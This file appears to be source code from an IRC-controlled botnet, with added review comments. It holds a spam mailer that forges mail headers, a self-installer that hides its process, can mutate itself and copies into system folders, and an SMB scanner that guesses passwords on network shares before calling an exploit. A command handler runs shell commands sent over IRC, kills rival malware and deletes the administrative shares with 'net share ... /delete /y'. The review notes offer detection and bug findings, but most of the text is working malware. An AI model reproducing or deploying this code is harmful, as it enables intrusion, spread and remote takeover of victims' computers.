sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n"); // Message-Id: <*****@*****.**> sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n"); } break; case MTA_TYPE_QMAIL: // Received: (qmail 21608 invoked by alias); 17 Jul 2002 14:30:10 -0000 sReqBuf.Append("Received: ("); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append("); "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n"); break; case MTA_TYPE_GAIA: break; case MTA_TYPE_MSSMTPSVC: break; case MTA_TYPE_MSEXCHANGE: break; case MTA_TYPE_HOTMAILWM: break; case MTA_TYPE_WEBMAIL: break; case MTA_TYPE_POSTFIX: break; case MTA_TYPE_SMTPD: break; case MTA_TYPE_LIST_AMIRC: break; } // From: xxxx <*****@*****.**> sReqBuf.Append("From: "); sReqBuf.Append(sMailFromFull.CStr()); sReqBuf.Append(" <"); sReqBuf.Append(sMailFrom.CStr()); sReqBuf.Append(">\r\n"); // To: [email protected] sReqBuf.Append("To: "); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append("\r\n"); // Subject: bla sReqBuf.Append("Subject: "); sReqBuf.Append(sSubject.CStr()); sReqBuf.Append("\r\n"); // Date: Tue, 25 Nov 2003 22:28:12 +0100 sReqBuf.Append("Date: "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n"); // MIME-Version: 1.0 sReqBuf.Append("MIME-Version: 1.0\r\n"); // if(g_cSMTPLogic.spam_htmlemail.bValue) { // Content-Type: text/html; charset=us-ascii sReqBuf.Append("Content-Type: text/html; charset=us-ascii\r\n"); // } else { // // Content-Type: text/plain; charset=us-ascii // sReqBuf.Append("Content-Type: text/plain; charset=us-ascii\r\n"); // } sReqBuf.Append("Content-Type: text/html; charset=us-ascii\r\n"); // Content-Transfer-Encoding: 7bit sReqBuf.Append("Content-Transfer-Encoding: 7bit\r\n"); // // <data> // . 
// if(g_cSMTPLogic.spam_htmlemail.bValue) { sReqBuf.Append("\r\n\r\n"); // } else { // sReqBuf.Append("\r\n"); // } sReqBuf.Append("\r\n\r\n"); sReqBuf.Append(sData.CStr()); sReqBuf.Append("\r\n.\r\n"); // Send data m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) { // Connection reset #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Connection reset!\n", this); #endif // DBGCONSOLE Disconnect(); return false; } // Check if data was accepted if(sRecvBuf.Mid(0, 3).Compare("250")) { // Data not accepted #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected MAIL FROM \"%s\", RCPT TO \"%s\"!\n", this, sMailFrom.CStr(), sRcptTo.CStr()); #endif // DBGCONSOLE Disconnect(); return false; } return true; }
// Greets the SMTP server on the already-connected socket.
//
// EHLO is tried first; if the reply does not start with "250" the function
// falls back to HELO. m_bUseSMTPExt records which greeting was accepted
// (true after EHLO, false after HELO). Returns true on an accepted greeting;
// on a failed receive or a rejected HELO it calls Disconnect() and returns
// false. The greeting argument is the local host name stored by the IRC
// component (g_pMainCtrl->m_cIRC.m_sLocalHost).
bool CSMTP_Connection::Hello()
{
    // Host name announced in the greeting
    CString sLocalName;
    sLocalName.Assign(g_pMainCtrl->m_cIRC.m_sLocalHost.CStr());

    CString sCommand;
    CString sReply;

    // First attempt: ESMTP greeting
    sCommand.Format("EHLO %s\r\n", sLocalName.CStr());
    m_sServerSocket.Write(sCommand.CStr(), sCommand.GetLength());

    if(!m_sServerSocket.Recv(sReply.GetBuffer(8192), 8192))
    {
        // Nothing came back: treat as a reset connection
#ifdef DBGCONSOLE
        g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
            "Connection reset!\n", this);
#endif // DBGCONSOLE
        Disconnect();
        return false;
    }

    if(!sReply.Mid(0, 3).Compare("250"))
    {
        // EHLO accepted: keep SMTP extensions switched on
#ifdef DBGCONSOLE
        g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
            "Enabled SMTP extensions!\n", this);
#endif // DBGCONSOLE
        m_bUseSMTPExt=true;
        return true;
    }

    // EHLO refused: retry with the plain HELO greeting
#ifdef DBGCONSOLE
    g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
        "Server rejected EHLO, disabling SMTP extensions!\n", this);
#endif // DBGCONSOLE

    sCommand.Format("HELO %s\r\n", sLocalName.CStr());
    m_sServerSocket.Write(sCommand.CStr(), sCommand.GetLength());

    if(!m_sServerSocket.Recv(sReply.GetBuffer(8192), 8192))
    {
#ifdef DBGCONSOLE
        g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
            "Connection reset!\n", this);
#endif // DBGCONSOLE
        Disconnect();
        return false;
    }

    if(sReply.Mid(0, 3).Compare("250"))
    {
        // Neither greeting was accepted
#ifdef DBGCONSOLE
        g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
            "Server rejected HELO!\n", this);
#endif // DBGCONSOLE
        Disconnect();
        return false;
    }

    // HELO accepted: plain SMTP only
    m_bUseSMTPExt=false;
    return true;
}
// CInstaller::CopyToSysDir - self-installation step: places a copy of the
// running executable in a system location under the name sFilename and hands
// control to that copy.
//
// What the code below does, in order:
//   - WIN32: stores GetSystemDirectory() in m_sSysDir, reads its own path with
//     GetModuleFileName(), resolves RegisterServiceProcess and the Toolhelp32
//     functions from kernel32.dll, and calls RegisterServiceProcess(0, 1) when
//     that export exists.
//   - otherwise: uses /tmp when getuid() is non-zero and /usr/sbin when it is
//     zero, and takes its own path from m_sArgv0.
//   - Unless the update or service flag is set, polls GetCopies(sFilename) once
//     per second for up to 60000 ms and calls exit(1) if two or more copies are
//     still reported.
//   - With the update flag set, may call KillProcess(sFilename), depending on
//     the result of cfilename.Find(sFilename).
//   - Depending on the cfilename.Find() checks against sysdir and the literal
//     "winhlpp32.exe" (Find()'s return convention is not visible here - TODO
//     confirm): builds "<sysdir><DIRCHAR><sFilename>" in tstr, copies the
//     executable there (CopyFile retried for up to 25000 ms, optionally via
//     CPolymorph::DoPolymorph; `cp` through system() off Windows), and in
//     non-_DEBUG builds starts the copy and exits.
//
// Returns true whenever it returns at all; the exit() paths never return.
//
// NOTE(review), host artifacts a responder can look for: a new executable
// written to the system directory (or /tmp, /usr/sbin), a child process started
// from that path with DETACHED_PROCESS, and, when bot_meltserver is set, a
// command line carrying -meltserver "<original path>".
// NOTE(review), memory safety: tstr and szCmdBuf are MAX_PATH-sized and filled
// with unbounded sprintf(); the strncat() calls pass sizeof(tstr) as the count,
// which limits the appended characters, not the total length, so all of these
// can write past the buffers.
// NOTE(review): the non-Windows paths pass unquoted file names to system().
// NOTE(review): the original author already flagged the polymorph/copy section
// with "FIXME::BAD!!!"; both outcomes of DoPolymorph() end in a CopyFile loop.
bool CInstaller::CopyToSysDir(CString &sFilename) { char tstr[MAX_PATH]; #ifdef WIN32 CString sysdir; GetSystemDirectory(sysdir.GetBuffer(MAX_PATH), MAX_PATH); m_sSysDir.Assign(sysdir.CStr()); CString cfilename; GetModuleFileName(GetModuleHandle(NULL), cfilename.GetBuffer(MAX_PATH), MAX_PATH); HINSTANCE kernel32_dll=LoadLibrary("kernel32.dll"); if(kernel32_dll) { fRegisterServiceProcess=(RSP)GetProcAddress(kernel32_dll, "RegisterServiceProcess"); fCreateToolhelp32Snapshot=(CT32S)GetProcAddress(kernel32_dll, "CreateToolhelp32Snapshot"); fProcess32First=(P32F)GetProcAddress(kernel32_dll, "Process32First"); fProcess32Next=(P32N)GetProcAddress(kernel32_dll, "Process32Next"); if(fRegisterServiceProcess) fRegisterServiceProcess(0, 1); } #else if(getuid()) { // We aren't root, use /tmp m_sSysDir.Assign("/tmp"); } else { // We are root, use /usr/sbin m_sSysDir.Assign("/usr/sbin"); } CString sysdir(m_sSysDir); CString cfilename(g_pMainCtrl->m_sArgv0); #endif // WIN32 #ifdef DBGCONSOLE g_cConsDbg.Log(5, "Checking for multiple copies...\n"); #endif // DBGCONSOLE if(!g_pMainCtrl->m_cCmdLine.m_cConfig.bUpdate && !g_pMainCtrl->m_cCmdLine.m_cConfig.bService) { unsigned long lStartTime=GetTickCount(); bool bFound=true; while((GetTickCount()-lStartTime) < 60000 && bFound) { if(GetCopies(sFilename)<2) bFound=false; Sleep(1000); } if(bFound) { #ifdef DBGCONSOLE g_cConsDbg.Log(5, "Found 2 copies, exiting...\n"); #endif // DBGCONSOLE exit(1); } } #ifdef DBGCONSOLE g_cConsDbg.Log(5, "First copy running...\n"); #endif // DBGCONSOLE long lTimeoutStart; if(!cfilename.Find(sFilename.CStr(), 0)) if(g_pMainCtrl->m_cCmdLine.m_cConfig.bUpdate) KillProcess(sFilename.CStr()); if(!cfilename.Find(sysdir, 0) || cfilename.Find("winhlpp32.exe", 0)) #ifdef LINUX if(!cfilename.Find(sFilename, 0)) #endif // LINUX { sprintf(tstr, "%s%c%s", sysdir.CStr(), DIRCHAR, sFilename.CStr()); lTimeoutStart=GetTickCount(); #ifdef DBGCONSOLE g_cConsDbg.Log(5, "Trying to copy to system directory...\n"); #endif // 
DBGCONSOLE // FIXME::BAD!!! #ifdef WIN32 if(g_pMainCtrl->m_pBot->inst_polymorph.bValue) { // Polymorph here CPolymorph cPoly; if(!cPoly.DoPolymorph(cfilename, tstr)) { // Fall back to copying if this didnt work while(CopyFile(cfilename, tstr, false)==false && GetTickCount()-lTimeoutStart < 25000) Sleep(2000); } else { while(CopyFile(cfilename, tstr, false)==false && GetTickCount()-lTimeoutStart < 25000) Sleep(2000); } } else { // Without Polymorph while(CopyFile(cfilename, tstr, false)==false && GetTickCount()-lTimeoutStart < 25000) Sleep(2000); } #else char szCmdBuf[MAX_PATH]; sprintf(szCmdBuf, "cp %s %s", cfilename.CStr(), tstr); system(szCmdBuf); #endif // WIN32 #ifdef DBGCONSOLE g_cConsDbg.Log(5, "Finished copying to system directory...\n"); #endif // DBGCONSOLE #ifndef _DEBUG #ifdef DBGCONSOLE g_cConsDbg.Log(5, "Starting new process...\n"); #endif // DBGCONSOLE if(g_pMainCtrl->m_pBot->bot_meltserver.bValue) { strncat(tstr, " -meltserver \"", sizeof(tstr)); strncat(tstr, cfilename.CStr(), sizeof(tstr)); strncat(tstr, "\"", sizeof(tstr)); } #ifdef WIN32 PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; memset(&sinfo, 0, sizeof(STARTUPINFO)); sinfo.cb = sizeof(sinfo); sinfo.wShowWindow = SW_HIDE; if(CreateProcess(NULL, tstr, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) { exit(0); } #else sprintf(szCmdBuf, "%s 2>&1 > /dev/null 2>&1 &", tstr); system(szCmdBuf); exit(0); #endif // WIN32 #endif // _DEBUG } return true; }
// CScannerNetBios::StartScan - probes one host (sHost) over SMB/NetBIOS and
// tries to authenticate to its shares.
//
// What the code below does:
//   - Proceeds only if ScanPort() succeeds on TCP 445 or 139, and reports the
//     host being scanned through the IRC connection.
//   - Converts the host name to wide characters and builds \\<host> and
//     \\<host>\IPC$ in m_wszServer / m_wszResource.
//   - If NullSession() succeeds, fills m_lUsers and m_lShares through
//     GetUsers() / GetShares().
//   - Appends every entry of the NULL-terminated arrays `names` and `shares`
//     (defined outside this view) to those lists.
//   - For every share and every user, calls AuthSession() with an empty
//     password, with the user name as password, and with each entry of `pwds`
//     (defined outside this view); the first success is passed to Exploit().
//     The loops stop once Exploit() returns true or m_pScanner->m_bScanning is
//     cleared.
//   - Deletes the userinfo / shareinfo objects and clears both lists.
//
// NOTE(review), detection: on the target this pattern is a burst of logon
// attempts from a single source across many account names, preceded by an
// anonymous IPC$ connection. Restricting anonymous (null) sessions, enforcing
// account lockout and using non-guessable passwords on accounts that can reach
// administrative shares are the controls this routine depends on being absent.
// NOTE(review), memory safety: m_wszServer / m_wszResource are filled with
// wcscpy()/wcscat() and no length check; their sizes are not visible here.
// NOTE(review): the lists own raw pointers that are released only at the end of
// this function, and entries left from an earlier scan are dropped by clear()
// without delete - presumably none remain at that point; confirm.
void CScannerNetBios::StartScan(const CString &sHost) { if(ScanPort(sHost.CStr(), 445) || ScanPort(sHost.CStr(), 139)) { g_cMainCtrl.m_cIRC.SendFormat(m_bSilent, m_bNotice, m_sReplyTo.Str(), "%s: scanning ip %s.", m_sScannerName.CStr(), sHost.CStr()); MultiByteToWideChar(CP_ACP, 0, sHost.CStr(), sHost.GetLength()+1, m_wszHost, (int)sizeof(m_wszHost)/(int)sizeof(m_wszHost[0])); wcscpy(m_wszServer, L"\\\\"); wcscat(m_wszServer, m_wszHost); wcscpy(m_wszResource, m_wszServer); wcscat(m_wszResource, L"\\IPC$"); int iNameCount=0, iShareCount=0; m_lUsers.clear(); m_lShares.clear(); CloseSession(); if(NullSession()) { GetUsers(&m_lUsers); GetShares(&m_lShares); CloseSession(); } while(names[iNameCount]) { userinfo *pUser=new userinfo; pUser->sName.Assign(names[iNameCount]); pUser->sServer.Assign(sHost); m_lUsers.push_back(pUser); iNameCount++; } while(shares[iShareCount]) { shareinfo *pShare=new shareinfo; pShare->sName.Assign(shares[iShareCount]); pShare->sRemark.Assign("default"); m_lShares.push_back(pShare); iShareCount++; } bool bExploited=false; list<shareinfo*>::iterator iShares; iShares=m_lShares.begin(); list<userinfo*>::iterator iUsers; iUsers=m_lUsers.begin(); while(iShares!=m_lShares.end() && !bExploited && m_pScanner->m_bScanning) { while(iUsers!=m_lUsers.end() && !bExploited && m_pScanner->m_bScanning) { WCHAR wszShare[MAX_PATH]; wcscpy(m_wszServer, L"\\\\"); wcscat(m_wszServer, m_wszHost); wcscpy(m_wszResource, m_wszServer); wcscat(m_wszResource, L"\\"); MultiByteToWideChar(CP_ACP, 0, (*iShares)->sName, (*iShares)->sName.GetLength()+1, wszShare, (int)sizeof(wszShare)/(int)sizeof(wszShare[0])); wcscat(m_wszResource, wszShare); if(AuthSession((*iUsers)->sName.CStr(), "") && !bExploited) { bExploited=Exploit((*iShares)->sName.CStr(), sHost.CStr(), (*iUsers)->sName.CStr(), ""); CloseSession(); } if(AuthSession((*iUsers)->sName.CStr(), (*iUsers)->sName.CStr()) && !bExploited) { bExploited=Exploit((*iShares)->sName.CStr(), sHost.CStr(), (*iUsers)->sName.CStr(), 
(*iUsers)->sName.CStr()); CloseSession(); } int pwd_count=0; while(pwds[pwd_count] && !bExploited) { if(AuthSession((*iUsers)->sName.CStr(), pwds[pwd_count]) && !bExploited) { bExploited=Exploit((*iShares)->sName.CStr(), sHost.CStr(), (*iUsers)->sName.CStr(), pwds[pwd_count]); CloseSession(); } pwd_count++; } iUsers++; } iShares++; iUsers=m_lUsers.begin(); } for(iUsers=m_lUsers.begin(); iUsers!=m_lUsers.end(); ++iUsers) delete (*iUsers); for(iShares=m_lShares.begin(); iShares!=m_lShares.end(); ++iShares) delete (*iShares); m_lUsers.clear(); m_lShares.clear(); } }
// CBot::HandleCommand - dispatcher for the core bot commands received over IRC.
//
// pMsg->sCmd is compared with the registered command names (m_cmdId,
// m_cmdExecute, ...); the first match runs and its result is returned.
// Returns false when no command matches.
//
// Branches visible below, by command object:
//   m_cmdId         - replies with bot_id.
//   m_cmdExecute    - WIN32: expands environment variables in the rest of the
//                     chat line and starts it with CreateProcess(); token 1
//                     selects SW_SHOW or SW_HIDE.
//   m_cmdRemove     - if the given nick equals m_sUserName: removes the
//                     autostart value and service when enabled, calls
//                     Uninstall() and stops the main loops.
//   m_cmdAbout      - replies with m_sNameVerStr.
//   m_cmdFlushDNS   - WIN32: runs the command named in the adjacent comment
//                     (ipconfig.exe /flushdns) through Execute().
//   m_cmdOpen       - passes token 1 to ShellExecute() with the "open" verb.
//   m_cmdQuit       - clears m_cIRC.m_bRunning.
//   m_cmdDns        - forward or reverse lookup of token 1, result sent back.
//   m_cmdRndNick / m_cmdNick - change the nickname (limited to 32 characters).
//   m_cmdCommand    - WIN32: passes the remainder of the chat line to system().
//   m_cmdSysInfo    - replies with SysInfo().
//   m_cmdLongUptime - replies with LongUptime(days), default 7 days.
//   m_cmdSecure     - WIN32: writes "N" to a value under
//                     HKLM\Software\Microsoft\OLE, deletes several registry
//                     values and system-directory files and kills the matching
//                     processes (names are produced by dp() and are not decoded
//                     here), then removes the c$, d$, ipc$ and admin$ shares
//                     with `net share ... /delete /y`.
//
// NOTE(review), impact: text taken from the IRC channel reaches
// CreateProcess(), ShellExecute() and system() unchanged, which is remote
// command execution for whoever is allowed to issue commands. No sender check
// is visible in this function; presumably the caller has already authorised
// pMsg - confirm.
// NOTE(review), detection: child processes such as `net share <name> /delete
// /y` or ipconfig /flushdns started by an unexpected parent, and removal of the
// default administrative shares, are observable host events for this routine.
// NOTE(review): most string constants here are hidden behind dp(...); the
// variable name tmpBagle suggests the deleted entries belong to other malware,
// which this view cannot confirm.
// NOTE(review): the registry calls in the m_cmdSecure branch ignore lRet, and
// the m_cmdCommand branch returns false on both the success and failure paths.
bool CBot::HandleCommand(CMessage *pMsg) { // ID if(!pMsg->sCmd.Compare(m_cmdId.sName.CStr())) { return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bot_id.sValue.Str(), pMsg->sReplyTo.Str()); } // Execute else if(!pMsg->sCmd.Compare(m_cmdExecute.sName.CStr())) { CString sText(pMsg->sChatString.Token(2, " ", true)); bool bVisible=atoi(pMsg->sChatString.Token(1, " ").CStr())==1; #ifdef WIN32 CString sTextExp; ExpandEnvironmentStrings(sText.CStr(), sTextExp.GetBuffer(8192), 8192); // interpret environment variables sText.Assign(sTextExp); PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; memset(&sinfo, 0, sizeof(STARTUPINFO)); sinfo.cb=sizeof(sinfo); if(bVisible) sinfo.wShowWindow=SW_SHOW; else sinfo.wShowWindow=SW_HIDE; if(!CreateProcess(NULL, sText.Str(), NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "exec.error", pMsg->sReplyTo.Str()); return false; } #endif return true; } // Remove Bot else if(!pMsg->sCmd.Compare(m_cmdRemove.sName.Str())) { CString sNick(pMsg->sChatString.Token(1, " ", true)); if (!sNick.Compare(g_cMainCtrl.m_sUserName.CStr())) { if(g_cMainCtrl.m_cBot.as_enabled.bValue) g_cMainCtrl.m_cInstaller.RegStartDel(g_cMainCtrl.m_cBot.as_valname.sValue); if(g_cMainCtrl.m_cBot.as_service.bValue) g_cMainCtrl.m_cInstaller.ServiceDel(g_cMainCtrl.m_cBot.as_service_name.sValue); g_cMainCtrl.m_cInstaller.Uninstall(); g_cMainCtrl.m_cIRC.m_bRunning=false; g_cMainCtrl.m_bRunning=false; } } // About else if(!pMsg->sCmd.Compare(m_cmdAbout.sName.CStr())) { return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, g_cMainCtrl.m_sNameVerStr.Str(), pMsg->sReplyTo.Str()); } // Flush DNS else if(!pMsg->sCmd.Compare(m_cmdFlushDNS.sName.CStr())) { #ifdef WIN32 // ipconfig.exe /flushdns Execute(dp(9,16,3,15,14,6,9,7,78,5,24,5,0).CStr(), dp(80,6,12,21,19,8,4,14,19,0).CStr()); #endif return true; } // Open File else if(!pMsg->sCmd.Compare(m_cmdOpen.sName.CStr())) { 
CString sText; sText=pMsg->sChatString.Token(1, " ").CStr(); CString bRet; bRet=(char)ShellExecute( NULL, "open", sText.CStr(), NULL, NULL, SW_SHOWNORMAL ); // bRet=system(sText.CStr())>0; // if(bRet) return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "file opened.", pMsg->sReplyTo.Str()); //else return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bRet.Str(), pMsg->sReplyTo.Str()); } // Quit else if(!pMsg->sCmd.Compare(m_cmdQuit.sName.CStr())) { g_cMainCtrl.m_cIRC.m_bRunning=false; return true; } // DNS else if(!pMsg->sCmd.Compare(m_cmdDns.sName.CStr())) { CString sReply; hostent *pHostent=NULL; in_addr iaddr; if(!pMsg->sChatString.Token(1, " ").Compare("")) return false; unsigned long addr=inet_addr(pMsg->sChatString.Token(1, " ").CStr()); if(addr!=INADDR_NONE) { pHostent=gethostbyaddr((char*)&addr, sizeof(struct in_addr), AF_INET); if(pHostent) { sReply.Format("%s resolved %s", pMsg->sChatString.Token(1, " ").CStr(), pHostent->h_name); return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } else { pHostent=gethostbyname(pMsg->sChatString.Token(1, " ").CStr()); if(pHostent) { iaddr=*((in_addr*)*pHostent->h_addr_list); sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), inet_ntoa(iaddr)); return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } if(!pHostent) { sReply.Format("resolve.error %s.", pMsg->sChatString.Token(1, " ").CStr()); return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } // Random Nickname else if(!pMsg->sCmd.Compare(m_cmdRndNick.sName.CStr())) { CString sRndNick=RndNick(si_nickprefix.sValue.CStr()); g_cMainCtrl.m_cIRC.SendRawFormat("%s %s\r\n", dp(40,35,29,37,0).CStr(), sRndNick.CStr()); g_cMainCtrl.m_sUserName.Format("%s", sRndNick.Mid(0, 32).CStr()); return true; } // Run Command else if(!pMsg->sCmd.Compare(m_cmdCommand.sName.CStr())) { #ifdef WIN32 
if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false; CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); bool bRet=false; CString sReplyBuf; sReplyBuf.Format("Executed: %s.", sText.CStr()); if(system(sText.CStr())==-1) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "exec.error", pMsg->sReplyTo.Str()); return false; } else { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); return false; } #endif return true; } // System Information else if(!pMsg->sCmd.Compare(m_cmdSysInfo.sName.CStr())) { return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, SysInfo().Str(), pMsg->sReplyTo.Str()); } // Find Files //else if(!pMsg->sCmd.Compare(m_cmdFindFiles.sName.CStr())) // { /* CString strMask = pMsg->sChatString.Token(1, " "); CString strDir = pMsg->sChatString.Token(2, " "); return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, FindFiles(strMask, strDir), pMsg->sReplyTo.Str()); */ //} // Change Nickname else if(!pMsg->sCmd.Compare(m_cmdNick.sName.CStr())) { g_cMainCtrl.m_sUserName.Format("%s", pMsg->sChatString.Token(1, " ", true).Mid(0, 32).CStr()); g_cMainCtrl.m_cIRC.SendRawFormat("%s %s\r\n", dp(40,35,29,37,0).CStr(), g_cMainCtrl.m_sUserName.CStr()); return true; } // Uptime check (default: 7d) else if(!pMsg->sCmd.Compare(m_cmdLongUptime.sName.CStr())) { int iDays=atoi(pMsg->sChatString.Token(1, " ").CStr()); if(!iDays) iDays=7; CString sUptime=LongUptime(iDays); if(sUptime.Compare("")) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ sUptime.Str(), pMsg->sReplyTo.Str()); } return true; } // Secure Bot else if(!pMsg->sCmd.Compare(m_cmdSecure.sName.CStr())) { #ifdef WIN32 CString regLoc; regLoc = dp(45,15,6,20,23,1,18,5,80,39,9,3,18,15,19,15,6,20,80,49,9,14,4,15,23,19,80,29,21,18,18,5,14,20,48,5,18,19,9,15,14,80,44,21,14,0).CStr(); HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128]; 
strcpy(szDataBuf, "N"); dwSize=strlen(szDataBuf); LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey); RegSetValueEx(hkey, dp(31,14,1,2,12,5,30,29,41,39,0).CStr(), NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize); RegCloseKey(hkey); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(45,19,1,20,5,78,5,24,5,0).CStr()); RegCloseKey(hkey); KillProcess(dp(9,18,21,14,72,78,5,24,5,0).CStr()); CString tmpBagle; GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(9,18,21,14,72,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(18,1,20,5,78,5,24,5,0).CStr()); RegCloseKey(hkey); KillProcess(dp(9,69,69,18,73,72,14,72,78,5,24,5,0).CStr()); GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(),dp(9,69,69,18,73,72,14,72,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(19,19,1,20,5,78,5,24,5,0).CStr()); RegCloseKey(hkey); KillProcess(dp(23,9,14,19,25,19,78,5,24,5,0).CStr()); GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(23,9,14,19,25,19,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(4,71,4,21,16,4,1,20,5,78,5,24,5,0).CStr()); RegCloseKey(hkey); KillProcess(dp(2,2,5,1,7,12,5,78,5,24,5,0).CStr()); GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(2,2,5,1,7,12,5,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(46,1,19,11,39,15,14,0).CStr()); RegCloseKey(hkey); 
KillProcess(dp(20,1,19,11,13,15,14,78,5,24,5,0).CStr()); GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(20,1,19,11,13,15,14,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(31,24,16,12,15,18,5,18,0).CStr()); RegCloseKey(hkey); system("net share c$ /delete /y"); system("net share d$ /delete /y"); system("net share ipc$ /delete /y"); system("net share admin$ /delete /y"); #endif return true; } return false; }
// Removes the user entry named sUsername from the access list (luStart).
//
// The whole list is walked, so when several entries share the name the last
// one found is the one removed. The entry is unlinked with list::remove()
// and then deleted.
// Returns true if an entry was removed, false if sUsername has no buffer or no
// entry matched.
bool CMac::DelUser(CString sUsername)
{
    if(!sUsername.CStr())
        return false;

    user *pMatch=NULL;
    list<user*>::iterator it=luStart.begin();
    while(it!=luStart.end())
    {
        user *pEntry=*it;
        // Compare() yields zero on equality
        if(!pEntry->sUsername.Compare(sUsername))
            pMatch=pEntry;
        ++it;
    }

    if(!pMatch)
        return false;

    luStart.remove(pMatch);
    delete pMatch;
    return true;
}
// Adds denied function names to a user's deny list (pUser->lDeny).
//
// sFuncname is a ':'-separated list; one func entry is allocated per token,
// in order, until the first empty token. Does nothing when pUser is NULL or
// sFuncname has no buffer. The entries are allocated with new and this
// function does not free them.
void CMac::AddBadFunc(CString sFuncname, user *pUser)
{
    if(!pUser || !sFuncname.CStr())
        return;

    // An empty token (Compare("") == 0) ends the list
    for(int iIndex=0; sFuncname.Token(iIndex, ":").Compare(""); ++iIndex)
    {
        func *pDenied=new func;
        pDenied->sFuncname=sFuncname.Token(iIndex, ":");
        pUser->lDeny.push_back(pDenied);
    }
}